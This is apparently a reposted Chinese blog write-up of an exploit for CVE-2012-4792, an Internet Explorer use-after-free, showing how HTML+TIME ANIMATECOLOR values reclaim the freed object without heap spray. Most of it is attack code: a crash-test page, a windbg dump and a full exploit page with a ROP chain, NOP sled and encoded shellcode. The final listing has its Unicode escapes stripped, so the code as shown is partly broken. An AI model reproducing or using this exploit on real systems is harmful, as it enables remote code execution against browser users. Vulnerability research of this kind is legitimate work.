  • CVE-2012-4792 Exploit Without Heap Spray

    前面的一篇用 Heap Spray 完成了在 Win7 下绕过 DEP 及 ASLR 的利用,这次同样以 CVE-2012-4792 作为例子。之前读到国外的一篇文章:

    http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/

    文章提到可以利用一种叫“HTML+TIME”的 IE 特性(下面代码里通过 <?IMPORT namespace="t" implementation="#default#time2"> 引入),借助它可以不需要 Heap Spray 就完成 exploit,具体说明如下:

    引用HTML+TIME的代码如下:
    <HTML XMLNS:t ="urn:schemas-microsoft-com:time">
    <head>
            <meta>
                    <?IMPORT namespace="t" implementation="#default#time2">
            </meta>
    .
    .
    .
        <t:ANIMATECOLOR id="myanim"/>
    接下来只需要构造 ANIMATECOLOR 的 values 属性(代码里赋值的是 a.values),该属性的含义可参考原文给出的知识库链接(转载时链接未保留),构造如下:
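    // Build the value list for the ANIMATECOLOR element: one long
    // attacker-controlled item followed by 21 "cyan" items (22 items in all).
    // NOTE(review): the \u escapes in this listing lost their backslashes when the
    // page was extracted; the windbg dump further down (dc poi(edi) -> 41414141
    // 'AAAA') shows the original literal was "\u4141\u4141", restored here.
    // Declared with let instead of an implicit global so the snippet also runs in
    // strict mode / module scope.
    let animvalues = "\u4141\u4141";
    // Double the first item until it is at least 0xDC UTF-16 code units long.
    while (animvalues.length < 0xDC) {
        animvalues += animvalues;
    }
    // 21 separators -> 22 items; each item later gets one 4-byte pointer slot,
    // i.e. a 22 * 4 = 0x58-byte allocation (see the text below).
    for (let i = 0; i < 21; i++) {
        animvalues += ";cyan";
    }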
    最终产生的字符串如下形式:
    “\u4141\u4141....;cyan;cyan;cyan;cyan”(末尾没有分号。注意转载时 \u 转义丢失了反斜杠,原始字面量应为 "\u4141\u4141",从后面 windbg 中 dc poi(edi) 显示的 41414141 'AAAA' 可以确认)
    每个分号作为分隔符,这样一共 22 项(1 项可控的长字符串 + 21 个 cyan),接下来将这个字符串通过以下方式赋值给 ANIMATECOLOR 的 values 属性:
    // Hand the prepared ';'-separated list to the ANIMATECOLOR element's
    // `values` attribute; the element parses it and, per the text below,
    // allocates one pointer per item. The element reference is also left in
    // the global `a`, as in the original. Any exception is deliberately
    // ignored (best-effort, same as the original).
    try {
         var anim = document.getElementById('myanim');
         a = anim;
         anim.values = animvalues;
    } catch (ignored) {
         /* swallowed on purpose */
    }
    由于 ANIMATECOLOR 的特性,a.values 会根据字符串的格式来申请堆空间,申请的空间大小取决于字符串被分号分割的项数,分配后的堆空间用每一项(分号分割的项)的地址来初始化:这里 22 项会申请 22*4 个字节的堆空间,即 0x58 大小,每个 DWORD 保存每一项的地址。项数选 22 就是为了得到 0x58 这个大小(从后面的崩溃现场可以看到 edi 正指向这样一块 0x58 的堆块)。这样我们就控制了内存中的一个指针(第一个 DWORD 指向我们的长字符串),并且能够控制该指针所指向的数据,接下来就可以进行 exploit 了:
    <!doctype html>
    <HTML XMLNS:t ="urn:schemas-microsoft-com:time">
    <head>
    <meta>
         <?IMPORT namespace="t" implementation="#default#time2">
    </meta>
         <script>
         // Crash test for CVE-2012-4792 using the HTML+TIME reallocation trick.
         // Reads the globals animvalues / i / a (created implicitly here) and the
         // page elements #a, #b and #myanim. The DOM calls in the first try block
         // are the use-after-free trigger and are order-sensitive; they are kept
         // exactly as in the write-up.
         function helloWorld() {
              var e0 = null;
              var e1 = null;
              var e2 = null;
              // First (attacker-controlled) item of the values list.
              // NOTE(review): the \u escapes in this listing lost their backslashes
              // during extraction; the windbg dump below (dc poi(edi) -> 41414141
              // 'AAAA') shows the original literal was "\u4141\u4141".
              animvalues = "u4141u4141"
         // Double the first item until it is at least 0xDC UTF-16 code units long.
         while(animvalues.length < 0xDC)
              {
              animvalues += animvalues
           }
         // Append 21 "cyan" items -> 22 items in total, so the per-item pointer
         // array the element allocates is 22 * 4 = 0x58 bytes (see the text above).
         for(i = 0; i < 21; i++)
           {
              animvalues += ";cyan";
           }
              // Use-after-free trigger, taken verbatim from the write-up (do not
              // reorder). Exceptions from the DOM calls are swallowed on purpose.
              try {
                   e0 = document.getElementById("a");
                   e1 = document.getElementById("b");
                   e2 = document.createElement("q");
                   e1.applyElement(e2);
                   e1.appendChild(document.createElement('button'));
                   e1.applyElement(e0);
                   e2.outerText = "";
                   e2.appendChild(document.createElement('body'));
              } catch(e) { }
              // JScript's explicit garbage-collection call; presumably needed so
              // the freed object's block is back on the heap before the next
              // allocation (the text does not explain it -- confirm).
              CollectGarbage();
              // Assigning `values` makes the ANIMATECOLOR element allocate the
              // 0x58-byte pointer array described above. In the crash dump below
              // edi points at that array and poi(edi) is the "AAAA..." string,
              // consistent with the array having reused the freed object's block.
              try {
                   a = document.getElementById('myanim');
                   a.values = animvalues;
              }
              catch(e) {}
    
    
         }
    
         </script>
    </head>
    <body onload="eval(helloWorld())">
         <t:ANIMATECOLOR id="myanim"/>
         <form id="a">
         </form>
         <dfn id="b">
         </dfn>
    </body>
    </html>
    windbg 附加后的崩溃信息如下(eip=41414141,说明控制流已经跳到了我们字符串里的内容):
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00199c60 ebx=0021d0a8 ecx=00000052 edx=00000000 esi=00000000 edi=00216468
    eip=41414141 esp=020df830 ebp=020df8a4 iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
    41414141 ??              ???
    0:008> dd edi
    00216468  00199c60 02e1ebc0 0023f5c0 0023f5d8
    00216478  0023f578 0016bda0 0016bbd8 00187da0
    00216488  0333bce0 0333bcf8 0333bd10 0333bd28
    00216498  0333bd40 0333bd58 0333bd70 0333bd88
    002164a8  0333bda0 0333bdb8 0333bdd0 0333bde8
    002164b8  0333be00 0333be18 eaa84100 ff080000
    002164c8  000000fe 00000000 00000000 00000000
    002164d8  00000000 00000000 00000000 00000000
    0:008> dc poi(edi)
    00199c60  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
    00199c70  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
    00199c80  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
    00199c90  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
    00199ca0  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
    00199cb0  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
    00199cc0  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
    00199cd0  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
    0:008> dc poi(edi+4)
    02e1ebc0  00790063 006e0061 02e80000 00000000  c.y.a.n.........
    02e1ebd0  eaf06f92 ff080167 02e235dc 001f9038  .o..g....5..8...
    02e1ebe0  02e8e12c 00000000 eaf06f95 ff0c0100  ,........o......
    02e1ebf0  6359d910 00000001 001f9028 00000000  ..Yc....(.......
    02e1ec00  eaf06f68 ff0c010a 00000000 00000000  ho..............
    02e1ec10  00000001 00000000 eaf06f6b ff080100  ........ko......
    02e1ec20  0021cfd0 001f9038 02e1eb78 00000000  ..!.8...x.......
    02e1ec30  00000000 00000000 00000000 00000000  ................
    0:008> dc poi(edi+8)
    0023f5c0  00790063 006e0061 00200000 00000000  c.y.a.n... .....
    0023f5d0  eaabd9a2 ff0e0100 00790063 006e0061  ........c.y.a.n.
    0023f5e0  00200000 00000000 eaabd9a5 ff080100  .. .............
    0023f5f0  00148098 00000001 1690030b 01700d8c  ..............p.
    0023f600  eaabd9d8 ff080100 0063006e 006c0061  ........n.c.a.l.
    0023f610  00700072 00000063 eaabd9db ff0c0100  r.p.c...........
    0023f620  00000002 50000001 50000007 02db1318  .......P...P....
    0023f630  eaabd9de ff0a0100 0074006e 00760073  ........n.t.s.v.
    可以看到 edi 指向一块大小为 0x58 的堆空间,其第一个 DWORD(poi(edi))指向前面构造的长字符串(内容全是 0x41),后面的 DWORD 依次指向各个 “cyan” 项(poi(edi+4)、poi(edi+8) 处都能看到 c.y.a.n);eip=41414141 说明从该字符串里取出的值被当作调用目标使用了。这样我们就控制了一个指针以及指针所指的数据。把前一篇文章用的 ROP 链放进第一项,
    <!doctype html>
    <HTML XMLNS:t ="urn:schemas-microsoft-com:time">
    <head>
    <meta>
         <?IMPORT namespace="t" implementation="#default#time2">
    </meta>
         <script>
         // NOTE(review): not explained in the text. Navigating to an ms-help://
         // URL is presumably done to get a helper module loaded whose addresses
         // the ROP chain below relies on -- confirm against the referenced
         // write-up before reusing.
         location.href = 'ms-help://'
         // Full exploit: same use-after-free trigger and HTML+TIME reallocation
         // as the crash test above, but the first value-list item now carries
         // the payload instead of 0x41 filler. Reads the globals animvalues / i /
         // a (created implicitly) and the page elements #a, #b and #myanim.
         // The DOM statements in the first try block are order-sensitive and
         // are kept exactly as in the write-up.
         function helloWorld() {
              var e0 = null;
              var e1 = null;
              var e2 = null;
              // Item 0 of the values list. The first DWORD of the 0x58-byte
              // pointer array points at this string (see the crash dump above),
              // so its contents are what the vulnerable code dereferences.
              // NOTE(review): every "uXXXX" here is a \uXXXX escape whose
              // backslash was stripped during extraction; the chain is left
              // byte-for-byte as published and is not decoded here.
              animvalues = 
              // ROP chain (the author's "ROP End" marker shows where it stops).
              "u34b4u51bfu10b8u51bdu2d97u51bducba0u51bd"+
              "u79e2u51c3u9683u51c5u6fbdu51c5ufffeua17f"+
              "u1e01u51c1u92d8u51c3ue67du51bfu6fbdu51c5"+
              "ufc3dua17fu1e01u51c1u592bu51bfucf3eu51be"+
              "ud150u51c5uf563u51beu7402u51c0u6fbdu51c5"+
              "u9090u9090ua8dcu51bd"+               //ROP End
              // Run of 0x9090 words: a NOP sled once the escapes are restored.
              "u9090u9090u9090u9090"+
              "u9090u9090u9090u9090u9090u9090u9090u9090"+
              "u9090u9090u9090u9090u9090u9090u9090u9090"+
              "u9090u9090u9090u9090u9090u9090u9090u9090"+
              "u9090u9090u9090u9090u9090u9090u9090u9090"+
              "u9090u9090u9090u9090u9090u9090u9090u9090"+
              "u9090u9090u9090u9090u9090u9090u9090u9090"+
              "u9090u9090u9090u9090u9090u9090u9090u9090"+
              "u9090u9090u9090u9090u9090u9090u4a41u51be"+
              "u9090u9090"+
              // Remaining words are presumably the encoded payload (not
              // described in the text and not decoded here).
              "uc481uf254uffffu2ebfue4edudbc0ud9c8u2474" +
              "u58f4uc933u33b1u7831u0312u1278uee83u06e9" +
              "u1235u4f19ueab6u30dau0f3eu62ebu4424ub35e" +
              "u082eu3853ub862u4ce0ucfabufa41ufe8duca52" +
              "uac11u4c91uaeeeuaec5u61cfuae18u9f08ue2d3" +
              "ud4c1u1346ua865u125aua7a9u6ce3u77ccuc697" +
              "ua7cfu5c08u5f87u3a22u5e38u58e7u2904uab8c" +
              "ua8feue244u9bffua9a8u14c1ub325u9206uc6d6" +
              "ue17cud16bu9846u54b7u3a5buce33ubbbfu8990" +
              "ub734udd5dudb13u3260ue728ub5e9u6effu91a9" +
              "u2bdbubb69u917auc4dcu7d9du6080u6fd5u13d5" +
              "ue5b4u9128u40c2ua92aue2ccu9843u6d47u2513" +
              "uca82u6febu7a8fu3664u3f45uc9e9u03b3u4a14" +
              "ufb36u52e3ufe33ud4a8u72afub0a0u21cfu90c1" +
              "ua4b3u7851u431au1bd2u4162";
    
         // 21 "cyan" items as in the crash test -> 22 items, i.e. the same
         // 22 * 4 = 0x58-byte pointer array. The crash test's doubling loop is
         // not used here.
         for(i = 0; i < 21; i++)
           {
              animvalues += ";cyan";
           }
              // Use-after-free trigger, taken verbatim from the write-up (do not
              // reorder). Exceptions from the DOM calls are swallowed on purpose.
              try {
                   e0 = document.getElementById("a");
                   e1 = document.getElementById("b");
                   e2 = document.createElement("q");
                   e1.applyElement(e2);
                   e1.appendChild(document.createElement('button'));
                   e1.applyElement(e0);
                   e2.outerText = "";
                   e2.appendChild(document.createElement('body'));
              } catch(e) { }
              // JScript's explicit garbage-collection call; presumably needed so
              // the freed object's block is back on the heap before the next
              // allocation (the text does not explain it -- confirm).
              CollectGarbage();
              // Assigning `values` allocates the 0x58-byte pointer array whose
              // first slot points at the payload string above.
              try {
                   a = document.getElementById('myanim');
                   a.values = animvalues;
              }
              catch(e) {}
    
    
         }
    
         </script>
    </head>
    <body onload="eval(helloWorld())">
         <t:ANIMATECOLOR id="myanim"/>
         <form id="a">
         </form>
         <dfn id="b">
         </dfn>
    </body>
    </html>

    这样就可以不通过 Heap Spray 完成漏洞的利用:HTML+TIME 的 values 列表让我们在确定的时机申请一块大小可控(项数 × 4 字节)、内容可控(各项的地址)的堆内存,用它占住被释放对象的位置即可,不再需要喷射大量内存来命中固定地址。

  • 原文地址:https://www.cnblogs.com/Lamboy/p/3879089.html